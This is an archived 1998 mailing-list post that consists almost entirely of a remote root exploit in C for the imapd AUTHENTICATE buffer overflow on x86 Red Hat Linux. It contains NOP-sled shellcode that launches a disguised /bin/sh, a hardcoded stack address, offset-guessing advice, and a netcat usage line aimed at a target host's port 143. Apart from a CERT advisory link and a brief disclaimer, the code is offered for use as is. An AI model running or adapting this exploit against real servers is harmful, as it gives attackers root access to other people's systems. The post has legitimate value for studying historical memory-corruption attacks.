Date: Fri, 25 Sep 1998 00:20:46 +0900
From: Taeho Oh <ohhara@OHHARA.POSTECH.AC.KR>
Subject: imapd exploit for x86 linux

begin imapd-ex.c
------------------------------
/*

        Imapd exploit code for x86 linux

        Remote user can gain root access.
        Tested redhat linux : 4.1 , 4.2 and 5.0
        Tested imapd version : 9.0 , 10.166 , 10.190 , 10.205 and 10.223

        Usage
        $ ( imapd-ex 0 ; cat ) | nc target.com 143
                     |
                     +------ try from -3000 to 3000 ( try in steps of 500 )

        How to patch imapd buffer overflow bug
        See http://www.cert.org/advisories/CA-98.09.imapd.html

        This program is only for demonstrative use only.
        USE IT AT YOUR OWN RISK!

        Programmed by Taeho Oh 1998/09/23

Taeho Oh ( ohhara@postech.ac.kr )                http://ohhara.postech.ac.kr

*/

#include<stdio.h>
#include<stdlib.h>

#define OFFSET                            0
#define RET_POSITION                   1032
#define RANGE                            20
#define NOP                            0x90

char shellcode[1024]=
        "\xeb\x38"                      /* jmp 0x38             */
        "\x5e"                          /* popl %esi            */
        "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi) */
        "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi) */
        "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi) */
        "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi) */
        "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi) */
        "\x89\xf0"                      /* movl %esi,%eax       */
        "\x83\xc0\x08"                  /* addl $0x8,%eax       */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)  */
        "\x31\xc0"                      /* xorl %eax,%eax       */
        "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  */
        "\xb0\x0b"                      /* movb $0xb,%al        */
        "\x89\xf3"                      /* movl %esi,%ebx       */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  */
        "\xcd\x80"                      /* int $0x80            */
        "\x31\xdb"                      /* xorl %ebx,%ebx       */
        "\x89\xd8"                      /* movl %ebx,%eax       */
        "\x40"                          /* inc %eax             */
        "\xcd\x80"                      /* int $0x80            */
        "\xe8\xc3\xff\xff\xff"          /* call -0x3d           */
        "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"    */ /* /bin/sh is disguised */

void main(int argc,char **argv)
{
        char buff[RET_POSITION+RANGE+1],*ptr;
        long *addr_ptr,addr;
        unsigned long sp;
        int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
        int i;

        if(argc>1)
                offset=atoi(argv[1]);

        sp=0xbffff29f;
        addr=sp-offset;

        ptr=buff;
        addr_ptr=(long*)ptr;
        for(i=0;i<bsize;i+=4)
                *(addr_ptr++)=addr;

        for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
                buff[i]=NOP;

        ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
        for(i=0;i<strlen(shellcode);i++)
                *(ptr++)=shellcode[i];

        buff[bsize-1]='\0';

        printf("* AUTHENTICATE {%d}\r\n",bsize);
        for(i=0;i<bsize;i++)
                putchar(buff[i]);
        printf("\r\n");
}
------------------------------
end imapd-ex.c